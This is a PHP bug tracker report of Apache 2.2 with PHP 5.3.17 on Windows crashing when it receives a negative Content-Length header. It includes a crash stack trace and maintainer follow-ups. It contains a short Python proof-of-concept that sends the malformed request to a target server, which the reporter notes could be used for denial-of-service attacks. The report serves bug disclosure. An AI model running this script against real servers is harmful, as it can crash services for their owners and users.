php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #63200 Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Submitted: 2012-10-02 14:45 UTC Modified: 2013-10-15 11:54 UTC
Votes:2
Avg. Score:4.0 ± 1.0
Reproduced:2 of 2 (100.0%)
Same Version:1 (50.0%)
Same OS:1 (50.0%)
From: chris at whyley dot com Assigned:
Status: No Feedback Package: Reproducible crash
PHP Version: 5.3.17 OS: Windows Server 2003
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2012-10-02 14:45 UTC] chris at whyley dot com
Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash 
by doing the following:

(1) Configure your Apache server to use a custom error handling page for the HTTP 
413 error (Request entity too large) by inserting this line into your httpd.conf:

    ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to the 
server with a negative integer for the HTTP "Content-Length" header and with the 
"Accept-Encoding" header set to "gzip, deflate"

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 
3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers aren't 
capable of handling file uploads over 2GB in size - instead of posting an 
accurate filesize for the Content-Length header they use a negative integer 
instead, causing the Apache server running PHP to crash. For further information 
on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DOS attacks on vulnerable systems.

Test script:
---------------
#!/usr/bin/python
 
import socket, sys
target = "10.211.55.3"
port   = 80;
request  = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding:	gzip, deflate\n"
request += "Content-Length: -1\n\n" 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()

Expected result:
----------------
Stable Apache, no crash.

Actual result:
--------------
Thread 2 - System ID 3008
Entry point   msvcrt!_endthreadex+3a 
Create time   10/2/2012 2:29:08 PM 
Time spent in user mode   0 Days 0:0:0.0 
Time spent in kernel mode   0 Days 0:0:0.15 


Full Call Stack

Function     Arg 1     Arg 2     Arg 3     Arg 4   Source 
php5ts!zend_hash_index_find+17     016f3460     0000000d     018ee6c0     
00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 
php5ts!_zend_list_delete+27     0000000d     016b0150     029811c0     016b0150   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 
php5ts!_php_stream_free+ae     029811c0     00000003     016b0150     029811c0   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a 
php5ts!php_zend_stream_mmap_closer+1a     029811c0     016b0150     0290a4e0     
007339f4   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 
php5ts!zend_file_handle_dtor+2a     0290a4e8     016b0150     00000000     
00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8 
php5ts!file_handle_dtor+14     0290a4e8     018ee828     018ee798     00000000   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b 
php5ts!zend_llist_del_element+71     016b1754     018ee828     007d9810     
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36 
php5ts!zend_destroy_file_handle+26     018ee828     016b0150     016b0150     
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 
242 
php5ts!zend_execute_scripts+c4     00000002     016b0150     00000000     
00000001   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234 
php5apache2_2!php_handler+64c     00fba200     006348e0     00fba200     00000000   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 + 
13 
libhttpd!ap_run_handler+25     00fba200     6eed3de0     00fba200     00634f68    
libhttpd!ap_invoke_handler+b0     00000000     00fb8938     018ee8f8     6ff0ef68    
libhttpd!ap_internal_redirect+37     00634f68     00fb8938     00eb6c50     
0000019d    
libhttpd!ap_die+1e8     00fb8938     00000000     00000001     00fba118    
libhttpd!ap_http_header_filter+9f     00fb96f8     00fba118     00fba118     
018ee974    
libhttpd!ap_pass_brigade+52     00fb96f8     00fba118     00000000     00fba118    
libhttpd!ap_content_length_filter+a9     00fb96e0     00eb6cb0     00fb96c8     
018ee9e0    
libhttpd!ap_pass_brigade+52     00fb96e0     00fba118     6fba4309     00fba118    
libhttpd!ap_byterange_filter+474     00fb96c8     00fba118     00fba060     
018eea1c    
libhttpd!ap_pass_brigade+52     00fb96c8     00fba118     00eb6cb0     00fba118    
mod_deflate+1352     00fba060     00fba118     00fba0c0     018eea58    
libhttpd!ap_pass_brigade+52     00fba060     00fba118     00fba080     00fba190    
mod_deflate+1aa1     00fc5a48     00fba1b0     00fba190     018eea84    
libhttpd!ap_pass_brigade+52     00fc5a48     00fba190     00fb9938     00fba190    
libhttpd!ap_old_write_filter+5b     00fba080     00fba190     00fba190     
018eeab4    
libhttpd!ap_pass_brigade+52     00fba080     00fba190     00fb9878     00fba138    
libhttpd!ap_set_etag+b28     00fba138     00fb9938     0000019d     6ff37324    
libhttpd!ap_set_etag+2bb     00fba190     00fb9e08     00000000     00000000    
libhttpd!ap_get_brigade+24     00fb9938     00fb9e08     00000000     00000000    
php5apache2_2!php_apache_sapi_read_post+3d     018eeb68     00000f9f     00000f9f     
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-
5.3.17\sapi\apache2handler\sapi_apache2.c @ 201 + 1a 
php5ts!sapi_deactivate+6f     016b0150     016b0150     00000000     00fb8938   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\sapi.c @ 423 + d 
php5ts!php_request_shutdown+3a6     00000000     00000004     00637170     
00fb8938   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1670 + 6 
php5apache2_2!php_handler+6b1     00fb8938     006348e0     00fb8938     00000000   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 682 
libhttpd!ap_run_handler+25     00fb8938     00fb8938     00fb8938     00000000    
libhttpd!ap_invoke_handler+b0     00000000     00fb7958     018eff38     6ff0adbc    
libhttpd!ap_die+29e     00fb8938     00000000     006535b0     00fb7958    
libhttpd!ap_get_request_note+1d0c     00fb7958     00fb7958     00fb7958     
00000001    
libhttpd!ap_run_process_connection+25     00fb7958     005c4488     018eff80     
6ff1df6c    
libhttpd!ap_process_connection+33     00fb7958     00eb49f8     7c911086     
00eb0448    
libhttpd!ap_regkey_value_remove+c7c     00fb7950     7c911086     7c9101db     
00ea2120    
msvcrt!_endthreadex+a9     00ea2120     7c911086     7c9101db     00ea2120    
kernel32!BaseThreadStart+37     77c3a341     00ea2120     00000000     00000000    


Exception Information
PHP5TS!ZEND_HASH_INDEX_FIND+17In 
httpd__PID__3560__Date__10_02_2012__Time_02_29_32PM__453__Second_Chance_Exception
_C0000005.dmp the assembly instruction at php5ts!zend_hash_index_find+17 in 
C:\Core\PHP-5317\php5ts.dll from The PHP Group has caused an access violation 
exception (0xC0000005) when trying to read from memory location 0x0d3e2d2d on 
thread 2

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2012-10-05 04:26 UTC] laruence@php.net
-Status: Open +Status: Feedback
 [2012-10-05 04:26 UTC] laruence@php.net
I can not reproduce this with 5.4, and from the backtrace, it seems crash in 
another place.

so, is it related with your index.php?  does it always crash no matter what the 
index.php is?
 [2012-10-05 10:26 UTC] chris at whyley dot com
I have not tested this issue under version 5.4 as my environment is setup for 5.3.17 - Are you able to recreate in 5.3.17 ?

It always crashes no matter what I have in index.php - in fact I can call any 
page and cause the crash to happen.
 [2013-02-18 00:36 UTC] php-bugs at lists dot php dot net
No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Open". Thank you.
 [2013-02-18 11:08 UTC] chris at whyley dot com
-Status: No Feedback +Status: Open
 [2013-02-18 11:08 UTC] chris at whyley dot com
Re-opening this bug as it still exists in the 5.3 stream.
 [2013-05-03 09:42 UTC] thomas at partyflock dot nl
I had this in 5.4.4 on my production servers but not on an identical test server, 
which runs on a local domain but uses the same (version) php, apache and modules.

The test server always returns a normal 200 page on the test server though, don't 
ask me why.

Removing the custom ErrorDocument indeed solves the problem.
 [2013-06-20 12:01 UTC] ab@php.net
-Status: Open +Status: Feedback
 [2013-06-20 12:01 UTC] ab@php.net
I cannot reproduce this too, using current php 5.4/5.5 or apache 2.4/2.2 from 
apachelounge. Some reproduce info must be overseen. Do you use apachelounge apache 
builds and official php builds (as those are we only support)?
 [2013-10-15 11:54 UTC] php-bugs at lists dot php dot net
No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Re-Opened". Thank you.
 
PHP Copyright © 2001-2022 The PHP Group
All rights reserved.
Last updated: Mon Aug 08 01:05:45 2022 UTC